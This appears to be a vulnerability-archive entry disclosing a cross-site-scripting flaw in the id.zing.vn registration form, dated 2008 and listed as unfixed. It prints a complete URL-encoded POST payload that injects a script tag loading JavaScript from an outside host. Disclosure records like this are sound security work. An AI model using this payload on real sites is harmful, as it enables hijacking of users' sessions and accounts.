Security researcher quangntenemy, has submitted on 09/03/2008 a cross-site-scripting (XSS) vulnerability affecting id.zing.vn, which at the time of submission ranked 737 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 23/04/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 09/03/2008 |
Date published: 23/04/2008 |
Fixed? Mail us! | Status: UNFIXED |
Author: quangntenemy |
Domain: id.zing.vn |
Category: XSS |
Pagerank: 737 |
URL: https://id.zing.vn/mp3/register/ |
POST: sSubmitStep2=sSubmitStep2&sUserName=%22+%2F%3E%3Cscript+src%3Dhttp%3A%2F%2Fquangntenemy.t35.com%2Flo lxss.js%3E%3C%2Fscript%3E&sPassword=testtest&sRePassword=testtest&sEmail=%22+%2F%3E%3Cscript+src%3Dh ttp%3A%2F%2Fquangntenemy.t35.com%2Flolxss.js%3E%3C%2Fscript%3E&sReEmail=%22+%2F%3E%3Cscript+src%3Dht tp%3A%2F%2Fquangntenemy.t35.com%2Flolxss.js%3E%3C%2Fscript%3E&sVerifyCode=testtest&ActionField=testt est |
Click here to view the mirror
|
|
|